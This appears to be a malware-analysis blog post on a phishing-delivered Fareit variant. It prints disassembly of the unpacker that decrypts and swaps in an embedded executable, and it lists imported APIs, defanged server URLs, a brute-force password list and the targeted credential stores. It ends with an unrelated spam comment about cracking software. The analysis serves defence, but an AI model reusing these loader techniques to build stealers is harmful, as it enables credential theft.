The message contains an attachment: a zip archive file Instructions Secured that contains an executable file Instructions Secured E-mail.exe that has its icon mimicked that of Adobe PDF files.
Notable details about the file shows no program name nor company name.
The Technical Part
The executable begins by decrypting a couple of data, into newly allocated memory spaces, containing codes that dynamically imports API that it will use later. This initially results to these APIs:
CPU Dump Address Value Comments 00240698 756A4BC6 ; kernel32.LoadLibraryA 0024069C 756A1225 ; kernel32.GetModuleHandleA 002406A0 756A1202 ; kernel32.GetProcAddress 002406A4 756A34EC ; kernel32.VirtualProtect 002406A8 756A1801 ; kernel32.VirtualAlloc 002406AC 756A183E ; kernel32.VirtualFree 002406B0 756A13D0 ; kernel32.CloseHandle 002406B4 756C9597 ; kernel32.CreateToolhelp32Snapshot 002406B8 756A14FA ; kernel32.GetModuleFileNameA 002406BC 756ACA6E ; kernel32.CreateFileA 002406C0 756A177B ; kernel32.SetFilePointer 002406C4 756A1856 ; kernel32.ReadFile 002406C8 756A11D8 ; kernel32.GetCurrentProcessId 002406CC 75725F19 ; kernel32.Module32First 002406D0 75726002 ; kernel32.Module32Next 002406D4 756A14DD ; kernel32.GetProcessHeap 002406D8 756A1126 ; kernel32.WaitForSingleObject 002406DC 779BDEC6 ; ntdll.RtlAllocateHeap
While at it, notable bugs can be seen when attempting to import more APIs. Simple string decryption was incomplete.
seg000:0000005B pop edi seg000:0000005C add edi, 0Dh seg000:0000005F inc byte ptr [edi] seg000:00000061 dec byte ptr [edi+1] seg000:00000064 dec byte ptr [edi+2] seg000:00000067 dec byte ptr [edi+4] seg000:0000006A push edi ; result: HeapAlloc seg000:0000006B push ebx seg000:0000006C call dword ptr [ebp+8] ; GetProcAddress seg000:0000006F mov [esi], eax seg000:00000071 add edi, 0Ah seg000:00000074 dec byte ptr [edi] ; byte decrypt seg000:00000076 inc byte ptr [edi+1] seg000:00000079 dec byte ptr [edi+2] seg000:0000007C inc byte ptr [edi+3] seg000:0000007F dec byte ptr [edi+4] seg000:00000082 dec byte ptr [edi+5] seg000:00000085 neg byte ptr [edi+6] ; BUG here seg000:00000088 not byte ptr [edi+7] seg000:0000008B push edi ; result: "HeapFrfe" seg000:0000008C push ebx seg000:0000008D call dword ptr [ebp+8] ; GetProcAddress seg000:00000090 mov [esi+4], eax seg000:00000093 add edi, 9 seg000:00000096 not byte ptr [edi] ; BUG here seg000:00000098 not byte ptr [edi+1] seg000:0000009B not byte ptr [edi+2] seg000:0000009E dec byte ptr [edi+8] seg000:000000A1 push edi ; result: FetTickCmunt seg000:000000A2 push ebx seg000:000000A3 call dword ptr [ebp+8] ; GetProcAddress
Next, embedded into the file is an encrypted PE file with a size of 0x16e00 (93,696) bytes. Allocates memory space with the said size and decrypts there.
seg000:0000065A push 4 seg000:0000065C push 1000h seg000:00000661 push edi ; size = 16e00 (93696 bytes) seg000:00000662 push 0 seg000:00000664 call dword ptr [ebp+10h] ; VirtualAlloc seg000:00000667 mov esi, eax seg000:00000669 sub esp, 104h seg000:0000066F mov edi, esp seg000:00000671 push 104h seg000:00000676 push edi seg000:00000677 push ebx seg000:00000678 call dword ptr [ebp+20h] ; GetModuleFileName store to stack seg000:0000067B push 0 seg000:0000067D push 80h seg000:00000682 push 3 seg000:00000684 push 0 seg000:00000686 push 1 seg000:00000688 push 80000000h seg000:0000068D push edi seg000:0000068E call dword ptr [ebp+24h] ; CreateFileA - opens our file GENERIC_READ seg000:00000691 add esp, 104h seg000:000000EA mov edi, eax seg000:000000EC push 0 seg000:000000EE push 0 seg000:000000F0 push dword ptr [ebp+6Ch] seg000:000000F3 push edi seg000:000000F4 call dword ptr [ebp+28h] ; SetFilePointer - start of encrypted dump 0x46ec file offset seg000:000000F7 mov ecx, [ebp+70h] seg000:000000FA push 0 seg000:000000FC push esp seg000:000000FD pop eax seg000:000000FE push dword ptr [esp] seg000:00000101 push eax seg000:00000102 push ecx seg000:00000103 push esi seg000:00000104 push edi seg000:00000105 call dword ptr [ebp+2Ch] ; ReadFile size=16e00 seg000:00000108 pop eax seg000:00000109 push edi seg000:0000010A call dword ptr [ebp+18h] ; CloseHandle seg000:0000010D call decryptAPEFile
Then replaces the whole running process with this new PE file by copying data section by section:
1. Use VirtualProtect API to replace memory protection with WRITE access.
2. Copy binary codes and data of the section based on the virtual size indicated in the PE section headers.
3. Restore the memory protection.
seg000:00000139 push eax seg000:0000013A push esp seg000:0000013B push 4 seg000:0000013D push edi seg000:0000013E push ebx seg000:0000013F call dword ptr [ebp+0Ch] ; VirtualProtect replace protection with write seg000:00000142 push esp seg000:00000143 push 2 seg000:00000145 push edi seg000:00000146 push ebx seg000:00000147 push esi seg000:00000148 mov ecx, edi seg000:0000014A mov edi, ebx seg000:0000014C rep movsb ; replace first 512 bytes of running process with new PE seg000:0000014E pop esi seg000:0000014F call dword ptr [ebp+0Ch] ; VirtualProtect - replace rights with readonly seg000:00000152 pop eax seg000:00000153 mov ecx, esi seg000:00000155 add ecx, [ecx+3Ch] seg000:00000158 lea edi, [ecx+18h] seg000:0000015B mov edx, [edi+20h] seg000:0000015E movzx eax, word ptr [ecx+14h] seg000:00000162 add edi, eax seg000:00000164 movzx ecx, word ptr [ecx+6] seg000:00000168 loc_168: seg000:00000168 pusha ; section seg000:00000169 mov eax, [edi+14h] seg000:0000016C test eax, eax seg000:0000016E jz short loc_1B1 seg000:00000170 mov eax, [edi+8] seg000:00000173 test eax, eax seg000:00000175 jz short loc_1B1 seg000:00000177 call sizealign seg000:0000017C mov ecx, eax seg000:0000017E mov eax, [edi+24h] seg000:00000181 call sub_42A seg000:00000186 add esi, [edi+14h] seg000:00000189 push dword ptr [edi+10h] seg000:0000018C mov edi, [edi+0Ch] seg000:0000018F add edi, ebx seg000:00000191 pop ebx seg000:00000192 push eax seg000:00000193 mov edx, esp seg000:00000195 push edx seg000:00000196 push eax seg000:00000197 push ecx seg000:00000198 push edi seg000:00000199 push ecx seg000:0000019A push edx seg000:0000019B push 4 seg000:0000019D push ecx seg000:0000019E push edi seg000:0000019F call dword ptr [ebp+0Ch] ; VirtualProtect for write seg000:000001A2 pop ecx seg000:000001A3 xor eax, eax seg000:000001A5 push edi seg000:000001A6 rep stosb seg000:000001A8 pop edi seg000:000001A9 mov ecx, ebx seg000:000001AB rep movsb ; copy data seg000:000001AD call dword ptr [ebp+0Ch] ; VirtualProtect for read only seg000:000001B0 pop eax seg000:000001B1 loc_1B1: seg000:000001B1 popa seg000:000001B2 add edi, 28h ; '(' seg000:000001B5 loop loc_168 ; rerun to all sections
Then dynamically imports the APIs indicated in the new PE's import section table and results to these APIs:
CPU Dump Address Value Comments 0041828C 756ACA6E ; kernel32.CreateFileA 00418290 756A1856 ; kernel32.ReadFile 00418294 756A13D0 ; kernel32.CloseHandle 00418298 756A1262 ; kernel32.WriteFile 0041829C 756B9A09 ; kernel32.lstrlenA 004182A0 756BA337 ; kernel32.GlobalLock 004182A4 756BA272 ; kernel32.GlobalUnlock 004182A8 756A4114 ; kernel32.LocalFree 004182AC 756A1A39 ; kernel32.LocalAlloc 004182B0 756A10FC ; kernel32.GetTickCount 004182B4 756C28B1 ; kernel32.lstrcpy 004182B8 756C2951 ; kernel32.lstrcat 004182BC 756ACABC ; kernel32.GetFileAttributesA 004182C0 756BDC78 ; kernel32.ExpandEnvironmentStringsA 004182C4 756A1AE2 ; kernel32.GetFileSize 004182C8 756ABDC0 ; kernel32.CreateFileMappingA 004182CC 756A1A75 ; kernel32.MapViewOfFile 004182D0 756A156F ; kernel32.UnmapViewOfFile 004182D4 756A4BC6 ; kernel32.LoadLibraryA 004182D8 756A1202 ; kernel32.GetProcAddress 004182DC 756C2B74 ; kernel32.GetTempPathA 004182E0 756C2909 ; kernel32.CreateDirectoryA 004182E4 756ACAEC ; kernel32.DeleteFileA 004182E8 756A1568 ; kernel32.GetCurrentProcess 004182EC 756A16B3 ; kernel32.WideCharToMultiByte 004182F0 756A11B0 ; kernel32.GetLastError 004182F4 756BDC90 ; kernel32.lstrcmp 004182F8 756C9597 ; kernel32.CreateToolhelp32Snapshot 004182FC 756C778B ; kernel32.Process32First 00418300 756A1B12 ; kernel32.OpenProcess 00418304 756C7549 ; kernel32.Process32Next 00418308 756ADDDC ; kernel32.FindFirstFileA 0041830C 756B99B3 ; kernel32.lstrcmpi 00418310 756C2921 ; kernel32.FindNextFileA 00418314 756A32CD ; kernel32.FindClose 00418318 756A1225 ; kernel32.GetModuleHandleA 0041831C 756A1EDC ; kernel32.GetVersionExA 00418320 756BD889 ; kernel32.GetLocaleInfoA 00418324 756A4D3F ; kernel32.GetSystemInfo 00418328 756C29CF ; kernel32.GetWindowsDirectoryA 0041832C 756AE6A7 ; kernel32.GetPrivateProfileStringA 00418330 756B9562 ; kernel32.SetCurrentDirectoryA 00418334 7571A3B1 ; kernel32.GetPrivateProfileSectionNamesA 00418338 756CBF8B ; kernel32.GetPrivateProfileIntA 0041833C 756CC45E ; kernel32.GetCurrentDirectoryA 00418340 756A16A6 ; kernel32.lstrlenW 00418344 756A1AA5 ; kernel32.MultiByteToWideChar 00418348 756A10EF ; kernel32.Sleep 0041834C 756A14FA ; kernel32.GetModuleFileNameA 00418350 756CB4FB ; kernel32.LCMapStringA 00418354 756A734E ; kernel32.ExitProcess 00418358 756AD03C ; kernel32.SetUnhandledExceptionFilter 00418360 762A2404 ; ole32.CreateStreamOnHGlobal 00418364 762A3ECA ; ole32.GetHGlobalFromStream 00418368 762C10DD ; ole32.CoCreateGuid 0041836C 762D4003 ; ole32.CoTaskMemFree 00418370 762D57FC ; ole32.CoCreateInstance 00418374 7629EF0B ; ole32.OleInitialize 0041837C 75FAAF26 ; USER32.wsprintfA 00418384 7746BC0D ; ADVAPI32.RegOpenKeyExA 00418388 7746BC25 ; ADVAPI32.RegQueryValueExA 0041838C 7746BED4 ; ADVAPI32.RegCloseKey 00418390 7745D2ED ; ADVAPI32.RegOpenKeyA 00418394 77461B89 ; ADVAPI32.RegEnumKeyExA 00418398 7745D3C1 ; ADVAPI32.RegCreateKeyA 0041839C 77461B96 ; ADVAPI32.RegSetValueExA 004183A0 7746BEE4 ; ADVAPI32.IsTextUnicode 004183A4 77462EBA ; ADVAPI32.RegOpenCurrentUser 004183A8 7745D539 ; ADVAPI32.RegEnumValueA 004183AC 7745E504 ; ADVAPI32.GetUserNameA 004183B4 766A9BA5 ; shell32.ShellExecuteA 004183BC 76090EA5 ; wininet.InternetCrackUrlA 004183C0 7609B636 ; wininet.InternetCreateUrlA 004183C8 75E5DAFE ; SHLWAPI.StrStrIA 004183CC 75E8C64B ; SHLWAPI.StrRChrIA 004183D0 75E5BF27 ; SHLWAPI.StrToIntA 004183D4 75E5CDB6 ; SHLWAPI.StrStrA 004183D8 75E5DB5A ; SHLWAPI.StrCmpNIA 004183DC 75E649E1 ; SHLWAPI.StrStrIW 004183E4 770DE846 ; urlmon.ObtainUserAgentString 004183EC 75563234 ; WS2_32.inet_addr 004183F0 75577133 ; WS2_32.gethostbyname 004183F4 75563F00 ; WS2_32.socket 004183F8 755648BE ; WS2_32.connect 004183FC 75563BED ; WS2_32.closesocket 00418400 7556C4C8 ; WS2_32.send 00418404 75564981 ; 00418408 719F17A8 ; wsock32.recv 0041840C 719F18E0 ; wsock32.setsockopt 00418410 7556C0FB ; WS2_32.WSAStartup 00418418 7389D1F9 ; userenv.LoadUserProfileA 0041841C 73893F0D ; userenv.UnloadUserProfile
Since the running process has been replaced by a new PE files, some information in its Process Environment Block should be changed such as the entry point and the image base.
seg000:000001D4 push dword ptr fs:30h seg000:000001DB pop eax seg000:000001DC mov eax, [eax+0Ch] seg000:000001DF mov eax, [eax+0Ch] seg000:000001E2 loc_1E2: seg000:000001E2 cmp [eax+18h], ebx seg000:000001E5 jz short loc_1EB seg000:000001E7 mov eax, [eax] seg000:000001E9 jmp short loc_1E2 seg000:000001EB loc_1EB: seg000:000001EB mov ecx, [esp] seg000:000001EE add ecx, [ecx+3Ch] seg000:000001F1 mov esi, [ecx+28h] seg000:000001F4 add esi, edi seg000:000001F6 mov [eax+18h], edi seg000:000001F9 mov [eax+1Ch], esi seg000:000001FC test word ptr [ecx+16h], 2000h seg000:00000202 jnz short loc_210 seg000:00000204 mov eax, dword ptr fs:18h seg000:0000020A mov eax, [eax+30h] seg000:0000020D mov [eax+8], edi ; update entry point in PEB
And then returns back to the modified process starting at the entry point.
seg000:0000021A mov [esp+1Ch], esi ; sets up at 0x1c where [esp] gets to be entry point seg000:0000021E popa seg000:0000021F push eax seg000:00000220 call callnextline2 seg000:00000225 pop eax seg000:00000226 cmp dword ptr [eax+64h], 200h seg000:0000022D jnz short loc_23E seg000:0000022F mov eax, [esp] seg000:00000232 mov dword ptr [esp], 0 seg000:00000239 push dword ptr [esp+4] seg000:0000023D push eax ; transfer control to new PE entry point seg000:0000023E loc_23E: seg000:0000023E xor eax, eax seg000:00000240 retn
Still Fareit
A simple binary comparison shows that this is a Fareit variant almost similar to that of Here are some of the highlighted differences:
* Malware download sites (can be updates of its variant):
.data:004140CD aHttpMissionsea db 'h00p://',0 .data:004140F4 aHttpBetterback db 'h00p://',0 .data:00414119 aHttpWww_printd db 'h00p://',0 .data:00414149 aHttpS381195155 db 'h00p://',0At the time of this writing, h00p:// and h00p:// were the only ones up and are both the same file with this MD5 060260f668ce9f0b6d8c75c2893f3796.
* Servers it sends stolen information to and receives updates from
.data:0041400C aHttpGuterprote db 'h00p://',0 .data:00414040 aHttpGuterprova db 'h00p://',0 .data:00414065 aHttpGutterglov db 'h00p://',0 .data:0041409B aHttpGutterguar db 'h00p://',0
* The passwords list it used to brute
.data:00416D79 aDiamond db 'diamond',0 .data:00416D81 aHope db 'hope',0 .data:00416D86 aMaggie db 'maggie',0 .data:00416D8D aMaverick db 'maverick',0 .data:00416D96 aOnline db 'online',0 .data:00416D9D aSpirit db 'spirit',0 .data:00416DA4 aGeorge db 'george',0 .data:00416DAB aFriends db 'friends',0 .data:00416DB3 aDallas db 'dallas',0 .data:00416DBA aAdidas db 'adidas',0 .data:00416DC1 a1q2w3e db '1q2w3e',0 .data:00416DC8 a7777 db '7777',0 .data:00416DCD aOrange db 'orange',0 .data:00416DD4 aTesttest db 'testtest',0 .data:00416DDD aAsshole db 'asshole',0 .data:00416DE5 aApple db 'apple',0 .data:00416DEB aBiteme db 'biteme',0 .data:00416DF2 a666666 db '666666',0 .data:00416DF9 aWilliam db 'william',0 .data:00416E01 aMickey db 'mickey',0 .data:00416E08 aAsdfgh db 'asdfgh',0 .data:00416E0F aWisdom db 'wisdom',0 .data:00416E16 aBatman db 'batman',0 .data:00416E1D aMichelle db 'michelle',0 .data:00416E26 aDavid db 'david',0 .data:00416E2C aEminem db 'eminem',0 .data:00416E33 aScooter db 'scooter',0 .data:00416E3B aAsdfasdf db 'asdfasdf',0 .data:00416E44 aSammy db 'sammy',0 .data:00416E4A aBaby db 'baby',0 .data:00416E4F aSamantha db 'samantha',0 .data:00416E58 aMaxwell db 'maxwell',0 .data:00416E60 a55555 db '55555',0 .data:00416E66 aJustin db 'justin',0 .data:00416E6D aJames db 'james',0 .data:00416E73 aChicken db 'chicken',0 .data:00416E7B aDanielle db 'danielle',0 .data:00416E84 aIloveyou2 db 'iloveyou2',0 .data:00416E8E aFuckoff db 'fuckoff',0 .data:00416E96 aPrince db 'prince',0 .data:00416E9D aJunior db 'junior',0 .data:00416EA4 aRainbow db 'rainbow',0 .data:00416EAC a112233 db '112233',0 .data:00416EB3 aFuckyou1 db 'fuckyou1',0 .data:00416EBC a1 db '1',0 .data:00416EBE aNintendo db 'nintendo',0 .data:00416EC7 aPeanut db 'peanut',0 .data:00416ECE aNone db 'none',0 .data:00416ED3 aChurch db 'church',0 .data:00416EDA aBubbles db 'bubbles',0 .data:00416EE2 aRobert db 'robert',0 .data:00416EE9 a222222 db '222222',0 .data:00416EF0 aDestiny db 'destiny',0 .data:00416EF8 aLoving db 'loving',0 .data:00416EFF aGfhjkm db 'gfhjkm',0 .data:00416F06 aMylove db 'mylove',0 .data:00416F0D aJasper db 'jasper',0 .data:00416F14 aHallo db 'hallo',0 .data:00416F1A a123321 db '123321',0 .data:00416F21 aCocacola db 'cocacola',0 .data:00416F2A aHelpme db 'helpme',0 .data:00416F31 aNicole db 'nicole',0 .data:00416F38 aGuitar db 'guitar',0 .data:00416F3F aBillgates db 'billgates',0 .data:00416F49 aLooking db 'looking',0 .data:00416F51 aScooby db 'scooby',0 .data:00416F58 aJoseph db 'joseph',0 .data:00416F5F aGenesis db 'genesis',0 .data:00416F67 aForum db 'forum',0 .data:00416F6D aEmmanuel db 'emmanuel',0 .data:00416F76 aCassie db 'cassie',0 .data:00416F7D aVictory db 'victory',0 .data:00416F85 aPassw0rd db 'passw0rd',0 .data:00416F8E aFoobar db 'foobar',0 .data:00416F95 aIlovegod db 'ilovegod',0 .data:00416F9E aNathan db 'nathan',0 .data:00416FA5 aBlabla db 'blabla',0 .data:00416FAC aDigital db 'digital',0 .data:00416FB4 aPeaches db 'peaches',0 .data:00416FBC aFootball1 db 'football1',0 .data:00416FC6 a11111111 db '11111111',0 .data:00416FCF aPower db 'power',0 .data:00416FD5 aThunder db 'thunder',0 .data:00416FDD aGateway db 'gateway',0 .data:00416FE5 aIloveyou db 'iloveyou!',0 .data:00416FEF aFootball db 'football',0 .data:00416FF8 aTigger db 'tigger',0 .data:00416FFF aCorvette db 'corvette',0 .data:00417008 aAngel db 'angel',0 .data:0041700E aKiller db 'killer',0 .data:00417015 aCreative db 'creative',0 .data:0041701E a123456789 db '123456789',0 .data:00417028 aGoogle db 'google',0 .data:0041702F aZxcvbnm db 'zxcvbnm',0 .data:00417037 aStartrek db 'startrek',0 .data:00417040 aAshley db 'ashley',0 .data:00417047 aCheese db 'cheese',0 .data:0041704E aA db 'a',0 .data:00417050 aSunshine db 'sunshine',0 .data:00417059 aChrist db 'christ',0 .data:00417060 a000000 db '000000',0 .data:00417067 aSoccer db 'soccer',0 .data:0041706E aQwerty1 db 'qwerty1',0 .data:00417076 aFriend db 'friend',0 .data:0041707D aSummer db 'summer',0 .data:00417084 a1234567 db '1234567',0 .data:0041708C aMerlin db 'merlin',0 .data:00417093 aPhpbb db 'phpbb',0 .data:00417099 a12345678 db '12345678',0 .data:004170A2 aJordan db 'jordan',0 .data:004170A9 aSaved db 'saved',0 .data:004170AF aDexter db 'dexter',0 .data:004170B6 aViper db 'viper',0 .data:004170BC aWinner db 'winner',0 .data:004170C3 aSparky db 'sparky',0 .data:004170CA aWindows db 'windows',0 .data:004170D2 a123abc db '123abc',0 .data:004170D9 aLucky db 'lucky',0 .data:004170DF aAnthony db 'anthony',0 .data:004170E7 aJesus db 'jesus',0 .data:004170ED aGhbdtn db 'ghbdtn',0 .data:004170F4 aAdmin db 'admin',0 .data:004170FA aHotdog db 'hotdog',0 .data:00417101 aBaseball db 'baseball',0 .data:0041710A aPassword1 db 'password1',0 .data:00417114 aDragon db 'dragon',0 .data:0041711B aTrustno1 db 'trustno1',0 .data:00417124 aJason db 'jason',0 .data:0041712A aInternet db 'internet',0 .data:00417133 aMustdie db 'mustdie',0 .data:0041713B aJohn db 'john',0 .data:00417140 aLetmein db 'letmein',0 .data:00417148 a123 db '123',0 .data:0041714C aMike db 'mike',0 .data:00417151 aKnight db 'knight',0 .data:00417158 aJordan23 db 'jordan23',0 .data:00417161 aAbc123 db 'abc123',0 .data:00417168 aRed123 db 'red123',0 .data:0041716F aPraise db 'praise',0 .data:00417176 aFreedom db 'freedom',0 .data:0041717E aJesus1 db 'jesus1',0 .data:00417185 a12345 db '12345',0 .data:0041718B aLondon db 'london',0 .data:00417192 aComputer db 'computer',0 .data:0041719B aMicrosoft db 'microsoft',0 .data:004171A5 aMuffin db 'muffin',0 .data:004171AC aQwert db 'qwert',0 .data:004171B2 aMother db 'mother',0 .data:004171B9 aMaster db 'master',0 .data:004171C0 a111111 db '111111',0 .data:004171C7 aQazwsx db 'qazwsx',0 .data:004171CE aSamuel db 'samuel',0 .data:004171D5 aCanada db 'canada',0 .data:004171DC aSlayer db 'slayer',0 .data:004171E3 aRachel db 'rachel',0 .data:004171EA aOnelove db 'onelove',0 .data:004171F2 aQwerty db 'qwerty',0 .data:004171F9 aPrayer db 'prayer',0 .data:00417200 aIloveyou1 db 'iloveyou1',0 .data:0041720A aWhatever db 'whatever',0 .data:00417213 aGod db 'god',0 .data:00417217 aPassword_1 db 'password',0 .data:00417220 aBlessing db 'blessing',0 .data:00417229 aSnoopy db 'snoopy',0 .data:00417230 a1q2w3e4r db '1q2w3e4r',0 .data:00417239 aCookie db 'cookie',0 .data:00417240 a11111 db '11111',0 .data:00417246 aChelsea db 'chelsea',0 .data:0041724E aPokemon db 'pokemon',0 .data:00417256 aHahaha db 'hahaha',0 .data:0041725D aAaaaaa db 'aaaaaa',0 .data:00417264 aHardcore db 'hardcore',0 .data:0041726D aShadow db 'shadow',0 .data:00417274 aWelcome db 'welcome',0 .data:0041727C aMustang db 'mustang',0 .data:00417284 a654321 db '654321',0 .data:0041728B aBailey db 'bailey',0 .data:00417292 aBlahblah db 'blahblah',0 .data:0041729B aMatrix db 'matrix',0 .data:004172A2 aJessica db 'jessica',0 .data:004172AA aStella db 'stella',0 .data:004172B1 aBenjamin db 'benjamin',0 .data:004172BA aTesting db 'testing',0 .data:004172C2 aSecret db 'secret',0 .data:004172C9 aTrinity db 'trinity',0 .data:004172D1 aRichard db 'richard',0 .data:004172D9 aPeace db 'peace',0 .data:004172DF aShalom db 'shalom',0 .data:004172E6 aMonkey db 'monkey',0 .data:004172ED aIloveyou_0 db 'iloveyou',0 .data:004172F6 aThomas db 'thomas',0 .data:004172FD aBlink182 db 'blink182',0 .data:00417306 aJasmine db 'jasmine',0 .data:0041730E aPurple db 'purple',0 .data:00417315 aTest db 'test',0 .data:0041731A aAngels db 'angels',0 .data:00417321 aGrace db 'grace',0 .data:00417327 aHello db 'hello',0 .data:0041732D aPoop db 'poop',0 .data:00417332 aBlessed db 'blessed',0 .data:0041733A a1234567890 db '1234567890',0 .data:00417345 aHeaven db 'heaven',0 .data:0041734C aHunter db 'hunter',0 .data:00417353 aPepper db 'pepper',0 .data:0041735A aJohn316 db 'john316',0 .data:00417362 aCool db 'cool',0 .data:00417367 aBuster db 'buster',0 .data:0041736E aAndrew db 'andrew',0 .data:00417375 aFaith db 'faith',0 .data:0041737B aGinger db 'ginger',0 .data:00417382 a7777777 db '7777777',0 .data:0041738A aHockey db 'hockey',0 .data:00417391 aHello1 db 'hello1',0 .data:00417398 aAngel1 db 'angel1',0 .data:0041739F aSuperman db 'superman',0 .data:004173A8 aEnter db 'enter',0 .data:004173AE aDaniel db 'daniel',0 .data:004173B5 a123123 db '123123',0 .data:004173BC aForever db 'forever',0 .data:004173C4 aNothing db 'nothing',0 .data:004173CC aDakota db 'dakota',0 .data:004173D3 aKitten db 'kitten',0 .data:004173DA aAsdf db 'asdf',0 .data:004173DF a1111 db '1111',0 .data:004173E4 aBanana db 'banana',0 .data:004173EB aGates db 'gates',0 .data:004173F1 aFlower db 'flower',0 .data:004173F8 aTaylor db 'taylor',0 .data:004173FF aLovely db 'lovely',0 .data:00417406 aHannah db 'hannah',0 .data:0041740D aPrincess db 'princess',0 .data:00417416 aCompaq db 'compaq',0 .data:0041741D aJennifer db 'jennifer',0 .data:00417426 aMyspace1 db 'myspace1',0 .data:0041742F aSmokey db 'smokey',0 .data:00417436 aMatthew db 'matthew',0 .data:0041743E aHarley db 'harley',0 .data:00417445 aRotimi db 'rotimi',0 .data:0041744C aFuckyou db 'fuckyou',0 .data:00417454 aSoccer1 db 'soccer1',0 .data:0041745C a123456 db '123456',0 .data:00417463 aSingle db 'single',0 .data:0041746A aJoshua db 'joshua',0 .data:00417471 aGreen db 'green',0 .data:00417477 a123qwe db '123qwe',0 .data:0041747E aStarwars db 'starwars',0 .data:00417487 aLove db 'love',0 .data:0041748C aSilver db 'silver',0 .data:00417493 aAustin db 'austin',0 .data:0041749A aMichael db 'michael',0 .data:004174A2 aAmanda db 'amanda',0 .data:004174A9 a1234 db '1234',0 .data:004174AE aCharlie db 'charlie',0 .data:004174B6 aBandit db 'bandit',0 .data:004174BD aChris db 'chris',0 .data:004174C3 aHappy db 'happy',0 .data:004174C9 aPass_0 db 'pass',0
* What does it steal?
Similar to the previous variants, it steals stored credentials from different applications, and most of it FTP clients. After further web search, found out this NoPaste item, dated April 21, 2013, titled ; Password recovery modules at Seems to be the source code module, in assembly language, that gathers stored credentials. The user who pasted this is not specified. The module's source is quite descriptive with these target applications:
- Common System Information
- FAR/FAR2/FAR3 built-in ftp client
- Windows/Total Commander built-in ftp client
- Ipswitch WS_FTP client
- CuteFTP
- FlashFXP
- FileZilla
- FTP Commander
- BulletProof FTP
- SmartFTP 2.x-4.x
- TurboFTP
- CoffeeCupFTP
- CoreFTP
- FTP Explorer
- Frigate3 FTP
- SecureFX 6.6
- UltraFXP 1.7
- FTPRush 2.1.4, 2.1.5
- WebSitePublisher 2.1.5
- BitKinex 3.2.3
- ExpanDrive 1.8.4
- ClassicFTP 2.14
- Fling 2.23
- SoftX 3.3
- Directory Opus (64-bit)
- CoffeeCup FreeFTP 4.3 / DirectFTP
- LeapFTP,
- WinSCP 4.3.2 (Build 1201)
- 32bit FTP 11.07.01
- NetDrive
- WebDrive 9.16 (build 2385) 64-bit
- FTP Control
- Opera 6.x - 11.x
- WiseFTP 1.x - 7.x
- FTP Voyager 11.x-15.x
- Mozilla Firefox 0.x-5.x
- Mozilla Firefox FireFTP addon
- Mozilla SeaMonkey 1.x-2.x
- Mozilla Flock 1.x-2.x
- Mozilla Suite Browser 1.x
- LeechFTP 1.3
- Odin Secure FTP Expert
- WinFTP
- FTP Surfer 1.0.7
- FTPGetter 3
- IE 4-9
- Dreamweaver CS5
- DeluxeFTP 6
- Google Chrome
- Chromium & SRWare Iron
- ChromePlus
- Bromium (Yandex Chrome)
- Nichrome
- Comodo Dragon
- RockMelt
- K-Meleon
- Epic
- StaffFTP
- AceFTP 3
- Global Downloader
- FreshFTP
- BlazeFTP
- NetFile
- 3D-FTP
- EasyFTP
- RDP (Windows Remote Desktop Connections)
- FTP Now
- Robo-FTP
- Certificate Grabber
- LinasFTP
- Cyberduck
- Putty (Russian version)
- Notepad++ (NppFTP plugin)
- CoffeeCup Visual Site Designer
- FTPShell
- FTPInfo
- NexusFile
- FastStone Browser
- CoolNovo
- WinZip (built-in FTP backup settings)
- Yandex.Internet
- sherrod FTP
- NovaFTP
- Common Windows Mail decryption code
- Windows Live Mail
- Windows Mail
- Becky!
- Pocomail
- IncrediMail
- The Bat!
- Outlook
- Thunderbird
- FastTrackFTP
Fareit has been around, as I recall 2 years now probably stealing the same stored credentials. And now targeting clients of Bank of America using the same old technique, Social Engineering. Hopefully, authors of these applications make modifications to securely store user's credentials.
Fareit gets behind scanners by shape shifting its looks for every variant. Using different techniques, like code obfuscation and encryption, to cover the real code beneath.
Thanks for sharing your knowledge to install & crack the Time Tables, but you need to update it now. Because there is a 2022 version available now.